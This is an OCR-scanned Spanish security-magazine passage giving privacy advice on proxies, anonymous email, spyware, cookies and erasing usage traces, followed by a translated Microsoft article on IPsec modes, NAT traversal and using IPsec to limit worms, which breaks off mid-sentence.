hecho de que todo individuo que accede a Internet utilizando di- 
ferentes tipos de aplicaciones cliente (correo, navegación, MI, 
etc.), enfrenta múltiples amenazas que afectan de una forma 
considerable la seguridad de sus datos y la privacidad de sus 
hábitos, muchas personas parecen seguir experimentando la 
falsa sensación de seguridad y anonimato que se cree tener al 
acceder a Internet y realizar diferentes acciones. 

En relación a esto, si se analizan diferentes estadísticas se 
puede obtener por ejemplo que una de cada diez computadoras 
tiene programas espía instalados (más adelante explicaremos 
qué son los programas espía o spywares). Estos mencionados 
programas recolectan información de todo tipo y la envían a 
servidores para que una empresa o individuo puedan utilizarla 
con fines comerciales o maliciosos. 

Muchos ya saben que al navegar en Internet se dejan huellas 
de las actividades que se realizan pero, lo que tal vez no consi- 
deren en profundidad, es que un individuo que recolecte toda 
esta información y con los recursos adecuados puede inclusive 
llegar a conocer la identidad real de la persona. 

En este espacio fundamentalmente trataremos diferentes peli- 
gros existentes relacionados a la privacidad y analizaremos di- 
ferentes herramientas para enfrentar estas amenazas. 


Navegación anónima 


Un navegador o cualquier otro programa que se utilice para 
acceder a Internet revela la dirección IP vinculada al equipo que 
se está utilizando además de otra tanta información relaciona- 
da a los hábitos del navegante, su perfil, etc. que, como men- 
cionábamos, pueden ser utilizados por quien los obtenga para 
diferentes fines. 

Ahora, existen formas de 
evitar que esto suceda, 
una de ellas es mediante 
la utilización de un servi- 
dor proxy. 


¿Qué es un servidor 
proxy? 


Es un equipo que actúa 
como intermediario entre 
los clientes de una red y 
los servidores remotos al 
que los primeros desean 
acceder. 

Un proxy en algunos 
casos realiza el almacena- 
miento de los objetos ac- 
cedidos mejorando de 
esta forma el rendimiento 
de la red, en otros casos 


Estaciones de 
Trabajo 


Recibe peticiones 
de los clientes. 
Almacena en su 

cache los objetos 

alcanzados. 
Oculta las IPs 
internas ante el 
servidor rernoto. 


oculta la dirección IP del cliente incrementando la seguridad y 
manteniendo la privacidad, o en el mejor de los casos puede re- 
alizar ambas funciones. 


Existen diferentes tipos de proxies, veamos algunos de ellos: 
Proxies CGl o anonimizadores 


Estos tipos de proxies actúan como filtros de seguridad entre un 
navegador y un sitio web visitado. El navegador debe conectar- 
se en primer lugar con el sitio web del proxy para luego desde 
ahí ingresar el URL del sitio web al que realmente quiere 
acceder, de esta forma el servidor remoto obtiene la dirección 
IP del anonimizador y no la del navegante. 

Otras ventajas de utilizar un anonimizador son que estos incor- 
poran filtros de contenido web como: 


Bloqueo de scripts y controles ActiveX. 

Bloqueo de envío y recepción de cookies. 

Cifrado de la URL a la que se está accediendo. 

Cifrado del contenido de las paginas con SSL (Secure Socket 
Layer). 

Eliminación de ventanas emergentes (Pop-up). 


Algunos proxies CGl son: 


Guardster: http://www.guardster.com 


Anonymizer.com: http://wwwanonymizer.com 


Proxies HTTP 


Los proxies HTTP actúan 
como intermediarios entre 
clientes de red y servido- 
res remotos. Cuando un 
cliente realiza una petición 
de información a Internet 
lo hará al servidor proxy, 
que aceptará esta petición 
y la presentará ante el ser- 
vidor como propia. Una 
vez recibida la información 
solicitada la enviará nue- 
vamente al cliente. 
Existen diferentes tipos de 
proxies HTTP: 


Transparentes: estos 
proxies no son anónimos, 
permiten conocer al servi- 
dor que la petición viene 
desde un proxy y le 

proporcionan además » 


Servidor 
Remoto 
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la dirección del cliente que realizó la petición. Su razón de ser 
es el almacenamiento de las páginas solicitadas para optimizar 
el acceso a los datos. 

Anónimos: estos proxies son anónimos, no envían al servidor 
web la dirección del cliente que realiza la petición pero sí le 
hacen saber que son proxies. 

Distorsionadores: estos proxies alteran la dirección del cliente 
y la reemplazan por una aleatoria. A diferencia de los transpa- 
rentes el servidor web sabrá que la petición viene desde un 
proxy pero registrará erróneamente la dirección del cliente. 
Altamente anónimos: con estos proxies no se envía ningún 
dato al servidor por lo que este último recibirá la petición del 
proxy creyendo que proviene del cliente. 


Proxies SOCKS 


Los proxies SOCKS a diferencia de los vistos anteriormente 
que, en un caso dependen del uso de un navegador o en otro 
caso de programas que usen solo el protocolo HTTP, permiten 
funcionar con casi cualquier tipo de protocolo basado en 
TCP/P. 

SOCKS incluye dos componentes un servidor y un cliente, de 
esta forma las direcciones IP de los clientes que realizan las pe- 
ticiones son ocultadas presentando al servidor remoto la direc- 
ción del servidor SOCKS. 

Algunos ejemplos de aplicaciones que pueden utilizarse con 
proxies SOCKS son: clientes FTP, programas de intercambio de 
archivos (P2P), programas de chat (mIRC), etc. 


En caso de aplicaciones Windows que no soporten 
SOCKS se puede utilizar SocksCap 
http://www.socks.permeo.com que permite a los clien- 
tes de aplicaciones Internet acceder al servidor remoto 
mediante servidores SOCKS. 


Correo electrónico anónimo 


Como la mayoría sabe, el correo electrónico es una de las he- 
rramientas más populares para un individuo que accede a 
Internet en la actualidad. Ahora, si analizamos el uso que se 
esté dando al mismo, hay varios factores que deberían ser con- 
siderados a la hora de utilizarlo, veamos algunos casos: 


Confidencialidad: Los mensajes de correo electrónico por 
defecto se transmiten en texto plano por lo que, de ser intercep- 
tados, pueden ser leídos por individuos no autorizados. 


Integridad: Al no incorporar por defecto controles de integridad 
pueden también ser manipulados. 


Autenticidad: Debido a que por defecto no cuentan con una 
firma, permiten a un individuo mal intencionado falsificar la iden- 
tidad del remitente. 

Anonimato: un correo electrónico incluye la dirección IP del 
equipo desde el que han sido enviados por lo que no mantienen 
anónimo al individuo. 

Los tres primeros puntos pueden ser cumplidos mediante el uso 


de firmas digitales, en esta nota analizaremos puntualmente el 
cuarto ítem mencionado: el anonimato. 


Servicios de correo web 
Las cuentas de correo electrónico que pueden contratarse gra- 
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tuitamente en alguno de los múltiples proveedores de este ser- 
vicio, constituyen, mediante la proporción de datos no reales, 
una de las formas más sencillas de enviar correo anónimo. 

De todas formas será necesario complementar esto con el uso 
de un proxy o repetidor para ocultar la dirección IP del equipo 
que se utiliza. 


Repetidores de correos anónimos 


Un repetidor o “remailer” puede ser una empresa que recibe 
correos de terceros y antes de reenviarlos al destinatario origi- 
nal elimina las cabeceras y nombres del mensaje del remitente. 
Además, esperan un tiempo aleatorio y los mezclan con otros 
mensajes para impedir el análisis del tráfico. 


Una técnica utilizada por aquellos individuos que 
envían correo no solicitado es el uso de servidores 
SMTP incorrectamente configurados que permiten el 
envío de mensajes desde cualquier dominio en lugar 
del dominio local. 


Protección contra programas espía (Spyware) 


Los programas espía o spyware son aplicaciones que se insta- 
lan por lo general de modo subrepticio junto con programas gra- 
tuitos, o en algunos casos mediante el acceso a determinados 
sitios en Internet. 

Estos programas tienen por objetivo recolectar entre otras 
cosas: información de actividad, datos personales, contactos de 
libretas de direcciones, etc. Una vez que recolecta estos datos 
los envía sin el consentimiento del usuario a distintos servido- 
res de acuerdo a su programación dejando toda esta informa- 
ción a disposición de terceras personas. 

Para prevenir la instalación de este tipo de software existen a- 
plicaciones anti-spyware que deben instalarse en un sistema. 
Estas aplicaciones pueden ser de tipo preventivo o correctivo. 
Las primeras se ejecutan al iniciar el sistema y permanecen re- 
sidentes evitando la instalación de spyware. Las segundas se 
deben ejecutar regularmente para eliminar el software espía del 
equipo afectado. 


Algunas de estas herramientas son: 


Ad-Aware: http://lavasoft. com 
NetCop System Shield: http://www.net-cop.com 
SpyBot Search 8 Destroy: http://security.kolla.de 


Web Bugs 


Quizá menos conocidos que los spywares, los Web Bugs son i- 
mágenes incrustadas en documentos html, pueden ser, páginas 
web o mensajes de correo en ese formato. Estas imágenes re- 
sultan invisibles al navegante, debido a que su tamaño es ina- 
preciable, o pueden ser transparentes. También puede presen- 
tarse en forma de código de poco tamaño. Si la página es des- 
cargada, o el correo abierto, el Web Bug puede ser rastreado 
por la compañía emisora, lo que proporciona información sobre 
la actividad del usuario en la red. 


Cookies 


Las cookies son herramientas potentes utilizadas por servido- 
res Web para almacenar y recuperar información acerca de sus 
visitantes. En relación a como están conformadas, básicamen- 
te son archivos de texto que algunos servidores solicitan al » 


navegador del visitante que sean copiados en su disco rígido. 
Dado que el Protocolo HTTP no almacena el estado de la 
sesión entre peticiones sucesivas, las cookies proporcionan un 
mecanismo de conservar esta información del cliente, exten- 
diendo las capacidades de las aplicaciones cliente/servidor 
basadas en la Web. Mediante el uso de cookies se permite a 
servidores Web almacenar datos del usuario, como preferen- 
cias de visualización de páginas, nombre y contraseña, produc- 
tos que más le interesan, etc. 

Entre las principales ventajas de las cookies se considera que 
al ser almacenadas en el disco rígido del usuario, liberan al ser- 
vidor de una importante sobrecarga. Es el cliente quien almace- 
na la información descripta y quien se la devuelve al servidor 
cuando la solicita. Por lo general las cookies poseen una fecha 
de caducidad, que puede durar el tiempo que dure la sesión o 
hasta una fecha futura especificada, a partir de la cual dejan de 
ser operativas. 

Como se pudo apreciar las cookies constituyen una importante 
violación a la privacidad del usuario. Lo óptimo podría ser 
impedir la descarga de todas las cookies en el sistema pero, 
esto representaría que muchos sitios funcionaran incorrecta- 
mente ya que dependen de cookies para tal fin. De todas 
formas es importante tomar medidas para evitar entregar mayor 
información de la que se está dispuesto a brindar, para ello se 
puede configurar el mismo navegador. 


En el caso de Internet Explorer desde: Herramientas>Opciones 
de Internet>Privacidad se puede configurar el nivel de protec- 
ción deseado. 


dy Las cookies ya existentes en el sistema pueden ser eli- 
minadas accediendo a: Herramientas>Opciones de 
Internet>General>Eliminar Cookies. 


Herramientas Ayuda 


Correo y noticias » 
Bloqueador de elementos emergentes » 
Administrar complementos... 
Sincronizar... 

Windows Update 


Windows Messenger 
Consola de Sun Java 


es de Internet... 


Conexiones | Programas | Opciones avanzadas 
General | Seguridad Privacidad | Contenido 


> Configuración 


e Mueva el control deslizante para seleccionar una configuración de 
=4 privacidad para la zona Internet. 


Media 


- | -  -Bloquea cookies de terceros que no tiene una directiva 
de privacidad sólida 
- Bloquea cookies de terceros que usan información 
1) personal de identificación sin su consentimiento explícito 

- — -Restringe cookies internas que usan información personal 
de identificación sin su consentimiento explícito 


Archivos temporales de Intemet 


7 Las páginas visitadas se almacenan en una carpeta para tener acceso más 
rápido cuando lo desee. 


Eliminar archivos... Configuración... | 


Eliminar cookies... 


EJES 


dy En el navegador Opera se puede realizar la misma 
acción desde: Herramientas> Preferencias> Privacidad. 


Borrado de rastros en la computadora 


En una computadora existen diferentes tipos de rastros que 
pueden ser utilizados para realizar un seguimiento de las activi- 
dades realizadas por un usuario. Estos rastros se pueden cate- 
gorizar en rastros de navegación y de actividad. 


Rastros de navegación 


El historial es un registro que almacena los datos relacionados 
a actividades del usuario. Estos datos básicamente son: las di- 
recciones de todas las páginas web visitadas pero incluyen 
también los parámetros de entrada con los valores introducidos 
mediante teclado por el navegante. De acuerdo a su configura- 
ción además se pueden almacenar contraseñas, números de 
tarjeta de crédito y otro tipo de información confidencial. 

Por otro lado, el caché también almacena copias de objetos al- 
canzados, por lo que, si un individuo logra acceder a él podrá 
obtener datos sobre los hábitos de navegación y actividades re- 
alizadas. 

Es muy importante recordar al utilizar un equipo compartido o 
público realizar la eliminación de los rastros de navegación. 


dy Para eliminar el historial desde Internet Explorer se deberá 
acceder a: Herramientas>Opciones de Internet>General y 
seleccionar Borrar Historial. 


Historial 


La carpeta Historial contiene vínculos a las páginas ya visitadas para tener 
acceso más rápido cuando lo desee. 


| 
Días que puede guardar las - 
| Pácirac an Hita 20 E Borrar Historial » 
A 
L 
Colores... Fuentes... Idiomas... Accesibilidad... 


¡, Para vaciar el caché desde Internet Explorer se deberá 
acceder a: Herramientas>Opciones de Internet>General y 
seleccionar Eliminar archivos (sección Archivos tempora- 
les de Internet). 


- Archivos temporales de Internet 


7 Las páginas visitadas se almacenan en una carpeta para tener acceso más 
rápido cuando lo desee. 


Eliminar cookies... MEA Configuración... | 
A 


Rastros de actividad 


El sistema operativo almacena por defecto diferentes datos que 
permiten también de cierta forma, determinar las acciones que 
ha realizado un usuario en una computadora, entre estos datos 
podríamos mencionar: 


Documentos recientes: los últimos documentos accedidos se 
pueden ver en: Inicio>»Documentos recientes. 

Programas ejecutados: el sistema operativo Windows almace- 
na en Inicio>Ejecutar una lista de todos los programas que se 
hayan ejecutado mediante esa forma. » 
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Cuadro comparativo de los distintos proxies 


Tipo de É 
III A 


No se deben realizar cambios de configuración. 
No es necesario instalar software adicional. 
Incluyen funciones de protección adicionales para contenido web. 


En ocasiones incluyen publicidad. 
Solo se pueden utilizar para la 
navegación. 


HTTP Funcionan con el navegador o aplicaciones que soporten HTTP. Se debe cambiar la configuración 
del programa que los utilizará. 


Se debe cambiar la configuración 
del programa que los utilizará. 
Se requiere software adicional. 


Funcionan con cualquier tipo de protocolo TCPIP. 


Archivos temporales: en la carpeta CiWindowslemp el 
sistema operativo guarda fragmentos de actividades desarrolla- 
das en el equipo. 


Además de todos estos puntos expuestos se deben considerar 
primeramente los archivos que han sido eliminados de acuerdo 
a los siguientes puntos: 


Si los archivos fueron enviados a la papelera de reciclaje, y ésta 
no ha sido vaciada, son fácilmente recuperables. 


El hecho de que la papelera de reciclaje haya sido vaciada no 
representa que los archivos ya no pueden ser recuperados. Los 
archivos eliminados no desaparecen físicamente sino que la re- 
ferencia que tiene el sistema operativo a ellos (puntero) es eli- 
minada. Existen herramientas que permiten acceder a los datos 
que han sido eliminados, por lo que en caso de información 
crítica se deberían tomar otro tipo de recaudos. 


Herramientas de eliminación de rastros de uso 
diario 


Existen varias utilidades que se encargan de hacer más fácil la 
vida de los usuarios de computadoras en lo que respecta a eli- 
minación de rastros del uso diario de un equipo, algunos que se 
pueden mencionar son: 


Steganos Internet Trace Destructor: 
http://www. steganos.com/?product=id 


MindSoft Evidence Eraser: 
http://www.mindsoftweb.com/productos/evidence.htm 
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Herramientas para borrado irrecuperable de 
datos 


En materia de eliminación permanente de archivos también hay 
varias utilidades que cumplen la función de destructor de docu- 
mentos para los datos, algunos de ellos son: 


Eraser: 
http://www heidi.ie/eraser 


SDelete: 
http://www.sysinternals.com/ntw2k/soucer/sdelete.shtml 


Conclusión 

Como conlcusión de esta nota cabe destacar la importancia de 
la correcta protección de la información y para ello nada más ¡- 
lustrativo que evaluar según algunos fragmentos extraídos de 
artículos de conocidos medios no especializados en informática 
los resultados de la no consideración de todo lo expuesto: 
"Los delitos con datos robados de cuentas bancarias y tarjetas 
de crédito afectaron en los últimos cinco años a 27 millones de 
personas sólo en los EE.UU". Diario Clarín (07/09/2003). 
http://old.clarin.com/suplementos/economico/2003/09/07/n-01101.htm 


"Las PC argentinas son víctimas de los programas espías. Los 
especialistas afirman que ningún equipo queda al margen de 
los denominados spyware". Infobae (28/10/2004). 
http://www.infobae.com/notas/nota.php?ldx=1485858ldxSeccion=100442 
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Usando IPsec para la protección de las redes: 


Parte 1 de 2 


por Steve Riley 

Senior Program Manager 

Security Business and Technology Unit 
Microsoft Corporation 


IPsec (Internet Protocol Security, IP Seguridad) es realmen- 
te una de las tecnologías de seguridad más útiles que conozco. 
Aún así, permanece poco comprendida y poco utilizada, en 
gran parte porque puede ser difícil de entender y configurar. En 
la parte 1 presentaré la tecnología, en la próxima entrega (parte 
2) exploraré algunas posibilidades muy útiles que podrán ayu- 
darlos a solucionar problemas de seguridad vigentes. 


Cómo funciona IP sec 

Cuando dos computadoras pares utilizan IPsec para comuni- 
carse, ellas crean dos tipos de asociacio- 
nes de seguridad. En la primera, llamada 
“modo principal” o “fase uno”, los pares se 
autentican mutuamente entre sí, estable- 
ciendo confianza entre las computadoras. 
En la segunda llamada “forma rápida o fase 
dos”, los pares negociaran las particularida- 
des de la asociación de seguridad, inclu- 
yendo cómo firmarán digitalmente y encrip- 
tarán el tráfico entre ellas. El firmado de pa- 
quetes asegura que los datos no han sido 
modificados en el tránsito (integridad), la 
encriptación de paquetes asegura que los 
datos no han sido leídos (confidencialidad). 
Una computadora tendrá una sola “política 
IPsec” asignada por vez. La política puede 
tener cualquier número de “reglas”, cada 
una de los cuales tiene una “filter list” (lista 
de filtros) y una “filter action” (acciones). El 
“filter list” contiene uno o más filtros que es- | 
pecifican las características del tráfico que 
la regla debe procesar: direcciones de 
origen y destino, números de puerto de 
origen y destino, y tipos de protocolos. Los 
“filter action” especifican las conductas de 
la regla: si permitir el tráfico, bloquearlo o 
negociar las asociaciones lPsec entre 
“peers”. Las acciones que especifican negociaciones de seguri- 
dad pueden tener muchas opciones, incluyendo suites de en- 
criptación, métodos de autenticación por paquetes, cuán fre- 
cuente es necesario generar nuevas llaves, cómo responder a 
pedidos inseguros que llegan, y si comunicarse o no con com- 
putadoras que no apoyan IPsec. Cada regla en una política 
IPsec combina un “filter list” con un “filter action”. El tráfico que 
corresponde a un filter list particular es procesado de acuerdo 
con lo seteado en el filter action asociado. Las reglas también 
indican el modo de las asociaciones de seguridad (transporte o 
túnel, que se explica después) y uno de tres métodos de auten- 
ticación de fase uno: 


Preshared Keys (llaves compartidas) 
Incluido solamente para conformar RFC (request for comment), 


es una buena idea usar llaves pre- shared solo al probar sus po- 
líticas IPsec. Cada “peer” que participa en la misma política de 
seguridad necesitará la misma llave compartida. Secretos com- 
partidos no siguen siendo secretos por mucho tiempo! Más aún, 
están guardados en el registro (registry) de Windows y clara- 
mente visibles a cualquiera con privilegios administrativos en la 
computadora. 


Certificados digitales 
Mientras que cada “peer” posea un certificado IPsec o de com- 


putadora firmado por una autoridad en la que el otro par confía, 
los pares pueden autenticarse entre ellos. Note dónde radica la 
confianza: en el que firma el certificado. El nombre en el certi- 
ficado no es importante en este caso. Los certificados digitales 
son preferidos sobre las llaves compartidas porque cada “peer” 
puede tener su propio certificado y una jerarquía de certificados 
con niveles múltiples puede ayudar a crear políticas más granu- 
lares de lPsec. Por ejemplo una supersegura Máquina A podría 
aceptar solo certificados firmados por la muy prestigiosa autori- 
dad X , mientras la algo segura Máquina B puede aceptar certi- 
ficados firmados por la muy prestigiosa Autoridad X o la 
Autoridad Y de valor medio. 


Protocolo Kerberos Versión 5 » 
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Si ambos pares están en el mismo forest (bosque) Active 
Directory (AD), las computadoras que corren el sistema opera- 
tivo Windows Server 2003 pueden también usar el protocolo 
Kerberos para la autenticación inicial de computadora a compu- 
tadora. Kerberos es apropiado si usted no tiene una infraestruc- 
tura de llave pública (PKI) y no necesita establecer asociacio- 
nes de seguridad lPsec entre computadoras fuera de un único 
forest. 


Modos y métodos IPsec 

No existe tal cosa como un “túnel IPsec”. Vale la pena repetirlo: 
no existe tal cosa como el “túnel IPsec”. Sí, es una frase extre- 
madamente común, y todos piensan que saben lo que quiere 
decir, pero no tiene significado porque le falta especificidad. Se 
encuentran disponibles dos formas de asociaciones de seguri- 
dad de fase uno. 


Modo transporte 
Este es el más común de los dos, es frecuentemente lo que la 


AH (autenticación de header) 

Asociaciones de seguridad AH son de utilidad cuando el reque- 
rimiento es solamente de integridad y no de confidencialidad. 
AH computa un firma digital SHA1 o MD5 sobre el paquete 
entero (incluido el IP header que contiene la dirección de la 
fuente y el destino) y agrega esa firma al paquete. El receptor 
computa su propia versión de la firma y la compara con la firma 
guardada en el header; si se corresponden. Significa que el 
paquete no fue modificado. 


ESP Encapsulated Security Payload (Payload De 
Seguridad Encapsulado) 

Use asociaciones de seguridad ESP cuando tenga a la confi- 
dencialidad como una necesidad. El ESP negociará una llave 
de sesión DES o 3DES (triple DES) que será intercambiable 
entre los “peers” y de uso para encriptación del tráfico entre 
ellas. Se puede también especificar una firma digital en ESP 
tipo SHA1 o MD5. Note que ambas, la encriptación ESP y la 
computación de firmas, incluyen el payload y las partes de 


Vale la pena repetirlo: no existe tal cosa como el “túnel IPsec”. 


gente tiene en su mente cuando piensa en un “túnel IPsec”. En 
modo transporte dos “peers” se autentican entre sí (fase uno) y 
establecen los parámetros de firmado y encriptación del tráfico 
(fase dos). Cualquier tráfico entre las computadoras que con- 
cuerda con las características especificadas en el filter list será 
firmada y/o encriptada de acuerdo a los detalles del filter action 
asociado. El modo de transporte asegura que las comunicacio- 
nes entre las dos computadoras será libre de modificaciones y 
privada. El modo de transporte no crea nuevos paquetes, más 
bien asegura los paquetes existentes. Es interesante destacar, 
que es el modo transporte y no túnel, el usado en VPNs que 
usan L2TP+IPsec. lPsec así asegura el tráfico L2TP entre un 
cliente y un servidor VPN. 


Modo túnel 

El modo túnel es usado para asegurar las comunicaciones de 
sitio a sitio sobre una red no confiable. Cada sitio tiene un 
gateway IPsec configurado para rutear el tráfico hacia el otro 
sitio. Cuando una computadora en un sitio necesita comunicar- 
se con una computadora en otro, el tráfico pasa a través del 
gateway lPsec (y posiblemente a través de los routers intervi- 
nientes en cada sitio antes de alcanzar el gateway local). En el 
gateway, el tráfico saliente es encapsulado dentro de otro 
paquete completo y asegurado de acuerdo a los detalles del 
filter action en la regla. Por supuesto los gateways han ejecuta- 
do ya su autenticación de fase uno y establecido su asociación 
de seguridad de fase dos firmando/encriptando. En IPsec para 
Windows 2003 Server, el modo túnel es usado solamente por 
VPNSs de sitio a sitio en gateways configurados con Routing and 
Remote Access Service y no por cualquier tipo de comunicación 
de cliente a cliente o cliente a servidor. 


Un filter action puede especificar una entre tres conductas: per- 
mitir el tráfico, bloquear el tráfico o negociar seguridad. Los pri- 
meros dos no hacen realmente ningún tipo de procesamiento 
de seguridad: si el tráfico concuerda con filter list que está aso- 
ciado a un filter action “permitir”, el tráfico es autorizado a pasar; 
si el tráfico concuerda con un filter list que está asociado a un 
filter action “bloquear”, el tráfico no pasa. Los filter action que 
negocian seguridad pueden elegir uno o ambos de los 2 
métodos diferentes de seguridad clase dos: 
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header de TCP/IP de cada paquete pero no el IP header. 
Compare a AH cuya firma digital cubre el paquete entero. 


No hay dependencias entre modos y métodos. Asociaciones de 
seguridad que usen el modo transporte o el modo túnel 
pueden usar AH, ESP, o AH y ESP juntos. 


El protocolo IKE (Internet Key Enchange - 
Intercambio de Llave de Internet) 

Es el mecanismo por el cual las asociaciones de seguridad 
IPsec negocian sus suites de protección e intercambian firmas 
O llaves de encriptación. IKE define cómo los “peers” comunican 
sus políticas de información y cómo se construyen e intercam- 
bian los mensajes de autenticación. Es híbrido de otros tres pro- 
tocolos (ISAKMP, Oakley, y SKEME), IKE es ideal para los re- 
querimientos de IPsec. IKE es bastante complicado como para 
entenderlo plenamente, sería de utilidad poseer grados avanza- 
dos en matemáticas y criptografía y tener grandes cantidades 
de tiempo libre para leer material muy detallado y de alto valor. 


IPsec sobre NAT 

Una de las mayores causas de la no implementación de IPsec 
es la presencia de NAT (Network Address Translation-Traductor 
de Direcciones de Red). IPsec autentica computadoras; un NAT 
las esconde. Si medita sobre el tema se dará cuenta que el pro- 
pósito de IPsec y NAT están contrapuestos. Pero por la alta de- 
pendencia en NATs en la mayoría de las redes IPv4, hay una 
inmensa demanda por obtener dispositivos que usen NAT que 
trabajen correctamente en lIPsec. Además, haciendo que los 
dos trabajen juntos hará que rapidamente se acelere la adop- 
ción de |Psec. 

Hacer que IPsec atraviese un NAT es más difícil que lo que uno 
podría creer. Tres problemas influyen sobre IPsec y Nat: 


Violación de integridad del AH 

AH computa la firma digital del paquete antes de dejar el peer 
que envía. Si ese paquete pasa a través de un NAT (ya sea 
local o remoto), su header IP es modificado. El peer receptor, 
cuando computa su propia versión de la firma del paquete, ge- 
nerará un resultado diferente porque el NAT modificó la di- » 


rección fuente. Entonces el peer receptor eliminará el paquete. 


IPsec Helper (Ayudante) 
Muchos gateways NAT hogareños o de pequeñas oficinas inclu- 
yen un ítem llamado el IPsec “helper” (ayudante) o IPsec “atra- 
viese” (passtrhough). Originalmente diseñado para el modo 
túnel ese dispositivo también actúa en modo transporte. Si múl- 
tiples computadoras detrás del gateway crean asociaciones de 
seguridad IPsec a destinos fuera, éste enviará todo el tráfico 
IPEsec que arribe a la primera computadora que creó su aso- 
ciación de seguridad. La función 
de ayudante simplemente recuer- 
da cual computadora del interior 
inició una conversación lPsec y le 
reenvía todo el tráfico que arribe 
allí, sin modificaciones. ¿Entonces 
se crearán asociaciones de seguri- 
dad no verificadas? 


Fragmentación IKE 

Es común que el payload de un 
certificado digital excederá el 
tamaño de un frame IP. Cuando 
una aplicación genera un paquete 
de datos más grande que un frame 
IP, IP fragmenta el paquete de 
modo que cada paquete encaje en 
un solo frame. Aunque esto funcio- 
na bien dentro de una red local, 
dispositivos de red en las fronteras 
(network border devices)  (inclu- 
yendo muchos NATs) dejan caer 
fragmentos ya que fragmentos 
maliciosamente construidos son 
una manera popular de evitar fire- 
walls. NATs que dejan caer fragmentos evitarán que IKE funcio- 
ne bien. Resulta sin embargo, que definiendo un mecanismo 
para encapsular ESP (pero no AH) dentro de UDP, es posible 
reenviar tráfico IPsec a través de NAT sin que sea rechazado. 
Cada lado envía paquetes de descubrimiento (discovery 
packets) para determinar la existencia de un NAT local y si 
ambos lados son capaces de realizar NAT trasversal (NAT-T). Si 
uno de los dos lados están detrás de un NAT y ambos pueden 
realizar NAT-T, IPsec cambiará primero el intercambio IKE a 
UDP, puerto 4500 (de modo de evitar conflictos con lPsec 
helper) y luego encapsulará enteramente la asociación de segu- 
ridad de IPsec en la misma conversación UDP. Al NAT el tráfico, 
parece tráfico ordinario UDP, de modo que NAT puede manejar- 
lo sin problemas. Cada lado también intercambia sus detalles 
de NAT con el otro de modo de poder reconstruir los headers 


(encabezados) IP de tráfico recibido. Recordemos que NAT 
cambia los headers, de modo que quienes reciben deben *re- 
contruir” el header original antes de desencriptar el tráfico y 
checkear las firmas. El proceso de seteo de NAT-T le provee a 
cada lado la información necesaria para hacer esto. 

UDP-ESP (así es como se conoce la especificación) sabe cómo 
manejar múltiples asociaciones de seguridad IPsec detrás de 
un solo dispositivo NAT. Cuando múltiples computadoras hacen 
conexiones salientes usando el mismo protocolo, los dispositi- 
vos NAT usarán puertos de source únicos para cada computa- 
dora (esta es la forma en que NAT sabe cómo reenviar el trafico 
entrante que retorna). En cada 
cliente, NAT-T mantiene una tabla 
de pares de puerto source aso- 
ciación de seguridad y matchea el 
tráfico cuando fluye saliendo y 
entrando. 


Al momento de escribirse este ar- 
tículo, NAT-T es un borrador de 
Internet. Los autores continúan 
realizando pequeños cambios 
para mejorar la funcionalidad e in- 
teroperabilidad. NAT-T no está 
definida para AH ya que no hay 
manera de resolver efectivamen- 
te el problema de violación de in- 
tegridad de AH. Y, IETF decidió 
no abordar el tercer problema: 
fragmentación IKE. Si un lado 
] está bloqueando fragmentos, el 
administrador de ese lado necesi- 
e tará cambiar la programación 
= NAT o ese lado directamente no 
podrá participar en NAT-T. La im- 
plementación de NAT-T hecha 
por Microsoft incluye una solución de pre-fragmentación si los 
dos lados lo soportan. 
IKE fragmentará la llave en pedazos más pequeños antes de 
enviar los datos a la capa IP. Cada porción es entonces ubicada 
en un paquete IP completo y enviado. El lado receptor estará 
esperando esto y reconstruirá las porciones en la llave comple- 
ta. La fase de descubrimiento de NAT también chequea por 
soporte de fragmentación IKE y la usará sólo si ambos disposi- 
tivos lo pueden realizar. 


Este artículo también apareció en inglés en "Microsoft 
Security Newsletter (gratuito) al que recomendamos 
suscribirse. 
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Utilizando lIPsec para la protección de redes. 
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Con la parte 1 introduje IPsec, una maravillosa pero a veces 
desconcertante tecnología. Ahora que entiende cuál es y cómo 
trabaja, este mes me gustaría destacar la capacidad de I|Psec 
para ayudar a solucionar tres problemas comunes de seguri- 
dad. 


Utilizando IPsec para frenar gusanos 

Puede ser que suene trivial, pero la mejor manera de frenar los 
gusanos ¡es en primer lugar no ser contagiado! En parte, 
porque no todos entienden o incluso tienen cuidado acerca de 
las amenazas y los riesgos asociados al correo electrónico y a 
la navegación en Internet, es que los gusanos y otras clases de 
código malévolo son simplemente hechos de la vida cotidiana. 
Dado esto, ¿cómo podemos reducir el daño que tal código 
inflige? 

Usted puede frustrar al código malévolo de tres maneras dife- 
rentes: 

Evitar que el código sea instalado 

Evitar que el código sea ejecutado 

Evitar que el código se comunique 


La manera más difícil es evitar que el código sea instalado. 
Aunque los firewalls del anfitrión (host firewalls) y las utilidades 
de exploración de virus/ spyware pueden frenar cierto código 
malévolo, sigue siendo a menudo responsabilidad del usuario 
decidir si permitir que el código se instale o no. Ciertas caracte- 
rísticas de Microsoft Windows XP Service Pack 2 crean barre- 
ras adicionales contra el código malévolo pero todavía confían 
en que los usuarios dejen características habilitadas (que 
vienen por defecto) o tomando las decisiones correctas cuando 
el sistema operativo muestra avisos. Pero se pueden eliminar 
algunas de estas decisiones configurando muchas de las carac- 
terísticas con políticas de grupo (Group Policies) y no permitien- 
do que los usuarios ordinarios funcionen como administradores 
locales. 

Las SRP (Software Restriction Policies  - Políticas de 
Restricción de Software) evitan que el código malévolo se 
ejecute. Usando las políticas de grupo usted puede aplicar res- 
tricciones a una computadora que permitan que funcionen sola- 
mente los programas autorizados. Resista el impulso de incli- 
narse en otra dirección, esto es, permitir que todo funcione 
excepto lo malo conocido. ¿Cómo puede realmente conocer 
todo lo malo? Si usted combina una lista con programas permi- 
tidos de ser ejecutados (implementada en toda la organización), 
tiene un entorno en el que el código malévolo que logra acceder 
a una computadora no puede hacer algo peligroso, las SRP 
simplemente no lo dejaría correr. Soy un gran fan de SRP y lo 
animo a que investigue y las use en su organización. Para ayu- 
darlo a empezar he incluido algunos enlaces al final de este ar- 
tículo. 

En algunos casos su única opción puede ser evitar que el 
código malévolo se comunique. Las políticas de IPsec lo ayu- 
darán aquí tanto a limitar qué clase de tráfico aceptará una 
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computadora y qué clase de tráfico generará una computadora. 
Las reglas con acciones de filtrado (filter actions) que especifi- 
can simplemente bloquear o admitir tráfico (esto es, no crear 
ninguna asociación de seguridad) pueden obrar como los filtros 
básicos de paquetes en las computadoras individuales. Usted 
puede utilizar las políticas de grupo para asignar estas reglas a 
las computadoras y para reducir la cantidad de tráfico malévolo 
que se propaga a través de su red. 


Su opción de las políticas de IPsec depende de qué sistema o- 
perativo está utilizando. Windows XP o Windows Server 2003 
incluyen firewalls que son más eficaces que IPsec para bloque- 
